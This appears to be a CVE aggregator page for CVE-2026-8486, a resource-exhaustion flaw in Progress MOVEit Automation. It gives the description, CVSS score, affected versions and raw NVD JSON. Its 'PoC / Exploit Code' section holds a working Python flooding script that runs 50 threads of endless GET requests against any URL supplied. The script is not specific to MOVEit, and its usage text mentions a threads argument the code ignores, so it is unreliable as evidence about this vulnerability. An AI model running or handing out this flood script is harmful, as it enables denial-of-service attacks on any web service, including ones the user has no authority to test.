Security Vulnerability Report
中文
CVE-2026-8486 CVSS 5.3 MEDIUM

CVE-2026-8486

Published: 2026-05-20 16:16:27
Last Modified: 2026-05-20 17:32:36

Description

Allocation of resources without limits or throttling vulnerability in Progress Software MOVEit Automation allows Flooding. This issue affects MOVEit Automation: before 2025.0.11, from 2025.1.0 before 2025.1.7.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

No configuration data available.

MOVEit Automation < 2025.0.11
2025.1.0 <= MOVEit Automation < 2025.1.7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# Proof of Concept for CVE-2026-8486 # This script demonstrates the DoS potential by flooding the target. # Usage: python3 poc.py <target_url> <threads> import requests import threading import sys def flood(target_url): """Function to send requests continuously.""" try: while True: # Sending a simple GET request to consume server resources requests.get(target_url, timeout=5) except Exception as e: print(f"Error: {e}") if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python3 poc.py <target_url>") sys.exit(1) url = sys.argv[1] # Adjust the number of threads to increase load threads_count = 50 print(f"Starting Flooding Attack on {url} with {threads_count} threads...") for i in range(threads_count): t = threading.Thread(target=flood, args=(url,)) t.start()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-8486", "sourceIdentifier": "[email protected]", "published": "2026-05-20T16:16:27.347", "lastModified": "2026-05-20T17:32:35.827", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Allocation of resources without limits or throttling vulnerability in Progress Software MOVEit Automation allows Flooding.\n\nThis issue affects MOVEit Automation: before 2025.0.11, from 2025.1.0 before 2025.1.7."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-770"}]}], "references": [{"url": "https://docs.progress.com/bundle/moveit-automation-release-notes-2026/page/Fixed-Issues-2026.html", "source": "[email protected]"}]}}